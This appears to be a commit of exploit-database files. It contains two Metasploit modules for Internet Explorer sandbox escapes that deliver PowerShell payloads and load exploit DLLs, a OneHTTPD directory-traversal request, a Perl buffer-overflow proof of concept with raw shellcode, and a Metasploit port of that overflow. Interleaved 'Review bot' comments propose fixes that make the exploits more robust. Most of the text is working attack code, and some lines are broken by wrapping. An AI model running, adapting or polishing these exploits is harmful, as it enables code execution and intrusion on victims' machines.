exists in the .NET Deployment Service (dfsvc.exe), which can be run as Medium Integrity
Level. Further interaction with the component allows to escape the Enhanced Protected Mode
and execute arbitrary code with Medium Integrity.
},
'License' => MSF_LICENSE,
'Author' =>
[
'James Forshaw', # Vulnerability Discovery and original exploit code
'juan vazquez' # metasploit module
],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ],
'Targets' =>
[
[ 'IE 8 - 11', { } ]
],
'DefaultTarget' => 0,
'DefaultOptions' =>
{
'WfsDelay' => 30
},
'DisclosureDate'=> "Feb 11 2014",
'References' =>
[
['CVE', '2014-0257'],
['MSB', 'MS14-009'],
['BID', '65417'],
['URL', 'https://github.com/tyranid/IE11SandboxEscapes']
]
))
end
def check
unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe")
return Exploit::CheckCode::Unknown
end
net_version = get_net_version
if net_version.empty?
return Exploit::CheckCode::Unknown
end
unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll")
return Exploit::CheckCode::Detected
end
mscorlib_version = get_mscorlib_version
if Gem::Version.new(mscorlib_version) >= Gem::Version.new(NET_VERSIONS[net_version]["mscorlib"])
return Exploit::CheckCode::Safe
end
Exploit::CheckCode::Vulnerable
end
def get_net_version
net_version = ""
dfsvc_version = file_version("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe")
dfsvc_version = dfsvc_version.join(".")
NET_VERSIONS.each do |k,v|
if v["dfsvc"] == dfsvc_version
net_version = k
end
end
net_version
end
def get_mscorlib_version
mscorlib_version = file_version("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll")
mscorlib_version.join(".")
end
def exploit
print_status("Running module against #{sysinfo['Computer']}") unless sysinfo.nil?
mod_handle = session.railgun.kernel32.GetModuleHandleA('iexplore.exe')
if mod_handle['return'] == 0
fail_with(Failure::NotVulnerable, "Not running inside an Internet Explorer process")
end
unless get_integrity_level == INTEGRITY_LEVEL_SID[:low]
fail_with(Failure::NotVulnerable, "Not running at Low Integrity")
end
print_status("Searching .NET Deployment Service (dfsvc.exe)...")
unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe")
fail_with(Failure::NotVulnerable, ".NET Deployment Service (dfsvc.exe) not found")
end
net_version = get_net_version
if net_version.empty?
fail_with(Failure::NotVulnerable, "This module only targets .NET Deployment Service from .NET 4.5 and .NET 4.5.1")
end
print_good(".NET Deployment Service from .NET #{net_version} found.")
print_status("Checking if .NET is patched...")
unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll")
fail_with(Failure::NotVulnerable, ".NET Installation can not be verified (mscorlib.dll not found)")
end
mscorlib_version = get_mscorlib_version
if Gem::Version.new(mscorlib_version) >= Gem::Version.new(NET_VERSIONS[net_version]["mscorlib"])
fail_with(Failure::NotVulnerable, ".NET Installation not vulnerable")
end
print_good(".NET looks vulnerable, exploiting...")
cmd = cmd_psh_payload(payload.encoded).gsub('%COMSPEC% /B /C start powershell.exe ','').strip
session.railgun.kernel32.SetEnvironmentVariableA("PSHCMD", cmd)
temp = get_env('TEMP')
print_status("Loading Exploit Library...")
session.core.load_library(
'LibraryFilePath' => ::File.join(Msf::Config.data_directory, "exploits", "CVE-2014-0257", "CVE-2014-0257.dll"),
'TargetFilePath' => temp + "\\CVE-2014-0257.dll",
'UploadLibrary' => true,
'Extension' => false,
'SaveToDisk' => false
)
end
def cleanup
session.railgun.kernel32.SetEnvironmentVariableA("PSHCMD", nil)
super
end
end
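Review bot: `check` and `exploit` disagree on the same conditions. In `check`, a missing `dfsvc.exe` or a `dfsvc` version not in `NET_VERSIONS` returns `Exploit::CheckCode::Unknown`, while `exploit` treats exactly those cases as `Failure::NotVulnerable` ("This module only targets .NET Deployment Service from .NET 4.5 and .NET 4.5.1"); since the table is the complete list of supported builds, `check` should return `Safe` for an unrecognised version so its verdict matches what `exploit` will do. The `"#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\..."` path is also spelled out five times across `check`, `get_net_version`, `get_mscorlib_version` and `exploit`; a single helper returning the framework directory would remove the duplication. Finally, both `get_net_version` and `get_mscorlib_version` call `.join(".")` on the result of `file_version` with no guard, so a file that cannot be read turns `check` into an exception instead of `Unknown`.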

platforms/windows/local/33893.rb Executable file

@ -0,0 +1,120 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
require 'msf/core/exploit/exe'
require 'msf/core/exploit/powershell'
class Metasploit3 < Msf::Exploit::Local
Rank = GreatRanking
include Msf::Exploit::Powershell
include Msf::Exploit::EXE
include Msf::Exploit::Remote::HttpServer
include Msf::Post::Windows::Priv
def initialize(info={})
super( update_info( info,
'Name' => 'MS13-097 Registry Symlink IE Sandbox Escape',
'Description' => %q{
This module exploits a vulnerability in Internet Explorer Sandbox which allows to
escape the Enhanced Protected Mode and execute code with Medium Integrity. The
vulnerability exists in the IESetProtectedModeRegKeyOnly function from the ieframe.dll
component, which can be abused to force medium integrity IE to user influenced keys.
By using registry symlinks it's possible force IE to add a policy entry in the registry
and finally bypass Enhanced Protected Mode.
},
'License' => MSF_LICENSE,
'Author' =>
[
'James Forshaw', # Vulnerability Discovery and original exploit code
'juan vazquez' # metasploit module
],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ],
'Stance' => Msf::Exploit::Stance::Aggressive,
'Targets' =>
[
[ 'IE 8 - 11', { } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => "Dec 10 2013",
'References' =>
[
['CVE', '2013-5045'],
['MSB', 'MS13-097'],
['BID', '64115'],
['URL', 'https://github.com/tyranid/IE11SandboxEscapes']
]
))
register_options(
[
OptInt.new('DELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10])
])
end
def exploit
print_status("Running module against #{sysinfo['Computer']}") unless sysinfo.nil?
mod_handle = session.railgun.kernel32.GetModuleHandleA('iexplore.exe')
if mod_handle['return'] == 0
fail_with(Failure::NotVulnerable, "Not running inside an Internet Explorer process")
end
unless get_integrity_level == INTEGRITY_LEVEL_SID[:low]
fail_with(Failure::NotVulnerable, "Not running at Low Integrity")
end
begin
Timeout.timeout(datastore['DELAY']) { super }
rescue Timeout::Error
end
session.railgun.kernel32.SetEnvironmentVariableA("PSH_CMD", nil)
session.railgun.kernel32.SetEnvironmentVariableA("HTML_URL", nil)
end
def primer
cmd = cmd_psh_payload(payload.encoded).gsub('%COMSPEC% /B /C start powershell.exe ','').strip
session.railgun.kernel32.SetEnvironmentVariableA("PSH_CMD", cmd)
html_uri = "#{get_uri}/#{rand_text_alpha(4 + rand(4))}.html"
session.railgun.kernel32.SetEnvironmentVariableA("HTML_URL", html_uri)
temp = get_env('TEMP')
print_status("Loading Exploit Library...")
session.core.load_library(
'LibraryFilePath' => ::File.join(Msf::Config.data_directory, "exploits", "CVE-2013-5045", "CVE-2013-5045.dll"),
'TargetFilePath' => temp + "\\CVE-2013-5045.dll",
'UploadLibrary' => true,
'Extension' => false,
'SaveToDisk' => false
)
end
def on_request_uri(cli, request)
if request.uri =~ /\.html$/
print_status("Sending window close html...")
close_html = <<-eos
<html>
<body>
<script>
window.open('', '_self', '');
window.close();
</script>
</body>
</html>
eos
send_response(cli, close_html, { 'Content-Type' => 'text/html' })
else
send_not_found(cli)
end
end
end
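Review bot: the environment variables `PSH_CMD` and `HTML_URL` set in `primer` are only cleared on the normal path through `exploit`, i.e. after `Timeout.timeout(datastore['DELAY']) { super }` returns or times out; any other exception raised inside `super` leaves the PowerShell command string in the IE process environment. Move the two `SetEnvironmentVariableA(..., nil)` calls into an `ensure` clause, or into a `cleanup` method as the MS14-009 module in this same commit does. The `rescue Timeout::Error` body is empty, so a payload request that never arrives within `DELAY` is indistinguishable from success in the console; a `print_status` there would help. Documentation nits: the header comment reads `http//metasploit.com/download` (missing colon), and in the description `which allows to escape` should be `which allows escaping` and `force medium integrity IE to user influenced keys` is missing a verb after `IE`.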


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/39757/info
OneHTTPD is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
Exploiting the issue may allow an attacker to obtain sensitive information that could aid in further attacks.
OneHTTPD 0.6 is vulnerable; other versions may also be affected.
http://www.example.com/%C2../%C2../%C2../%C2../%C2../%C2../%C2../%C2../
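Review bot: the entry ends with the bare request `http://www.example.com/%C2../%C2../...` but never says why each `../` is prefixed with `%C2`, which is the whole substance of the advisory: a reader cannot tell from the text what sanitisation OneHTTPD 0.6 does perform, and therefore what a fix or a detection rule should look for. Suggest one sentence describing the role of the `%C2` prefix (presumably in how the server decodes the path before checking for `../`) and the fixed version, if the SecurityFocus entry lists one.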


@ -0,0 +1,33 @@
source: http://www.securityfocus.com/bid/39768/info
Serenity Audio Player is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
Serenity Audio Player 3.2.3 is vulnerable; other versions may also be affected.
#Serenity Audio Player 3.2.3 (SEH) Buffer Overflow
#Download :
http://malsmith.kyabram.biz/serenity/serenity-3.2.3-win32-installer.exe
#By Madjix Dz8[at]hotmail[dot]com
my $hd= "http://" ;
my $jnk="\x41" x 838 ;
my $nops = "\x90" x 10 ;
my $shellcode= "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";
my $mad="\xe9\xd4\xfe\xff\xff";
my $nseh="\xeb\xf9\x90\x90";
my $seh="\xe8\x47\x40";
open(MYFILE,'>>MadjiX.m3u');
print MYFILE $hd.$jnk.$nops.$shellcode.$mad.$nseh.$seh;
close(MYFILE);
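Review bot: the Perl PoC has no `#!/usr/bin/perl` line and no `use strict; use warnings;`, and `open(MYFILE,'>>MadjiX.m3u');` never checks its return value, so a failed open produces a silent empty run; add `or die "cannot open: $!"`. The buffer layout is undocumented: the `838` bytes of filler, the 10 NOPs, the `$mad` near jump, the `$nseh` short jump and the 3-byte `$seh` value carry no comment saying which offset or which module each corresponds to, whereas the Metasploit port of the same bug in the next file comments every component; this one should too. Also the `#Download :` comment and the URL below it have been split onto two lines, leaving the bare URL as a Perl statement rather than a comment; it needs its leading `#`.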


@ -0,0 +1,92 @@
source: http://www.securityfocus.com/bid/39768/info
Serenity Audio Player is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
Serenity Audio Player 3.2.3 is vulnerable; other versions may also be affected.
# Exploit Title: Serenity Audio Player Buffer Overflow (Meta)
# Date: April 26, 2010
# Author: Blake
# Version: 3.2.3
# Tested on: Windows XP SP3
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Serenity Audio Player Buffer Overflow Exploit',
'Description' => %q{
This module exploits a buffer overflow in Serenity Audio
Player versions 3.2.3 and below.
By creating a specially crafted m3u file, an an attacker may be
able to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Blake',
],
'Version' => '$Revision: 1 $',
'References' =>
[
[ 'URL', 'http://www.exploit-db.com/exploits/10226' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
},
'Payload' =>
{
'Space' => 972,
'BadChars' => "\x00\x0a\x0d\x20\x0b\x1a",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows Universal', { 'Ret' => 0x00402593} ], # pop
edi; pop esi; ret - serenity.exe
],
'Privileged' => false,
'DisclosureDate' => 'Nov 11 2009',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ false, 'The file
name.','exploit.m3u']),
], self.class)
end
def exploit
sploit = "http://" # header
sploit << rand_text_alphanumeric(972 - payload.encoded.length)
sploit << make_nops(10) # nop sled 1
sploit << payload.encoded # shellcode
sploit << make_nops(10) # nop sled 2
sploit << "\xe9\x4a\xfc\xff\xff" # near jump -950
sploit << "\xeb\xf9\x90\x90" # short jump
sploit << [target.ret].pack('V') # p/p/r
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(sploit)
end
end
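Review bot: two statements have been wrapped across line breaks and will not parse as shown: `[ 'Windows Universal', { 'Ret' => 0x00402593} ], # pop` continues on the next line as `edi; pop esi; ret - serenity.exe`, a bare expression outside the comment, and `OptString.new('FILENAME', [ false, 'The file` continues as `name.','exploit.m3u']),`, a string literal split in two. Rejoin each onto a single line. The `'Space' => 972` payload constraint and the `972 - payload.encoded.length` filler in `exploit` are tied together only implicitly; a named constant, or a comment on that `sploit <<` line stating what the 972-byte region is, would make the layout self-explanatory. The `Ret` value `0x00402593` contains a null byte that is also listed in `BadChars`; that is acceptable only because the address is the last thing written to the file, and a comment saying so would save the next reader a double take. The `'Version' => '$Revision: 1 $'` field is a legacy SVN keyword and can be dropped.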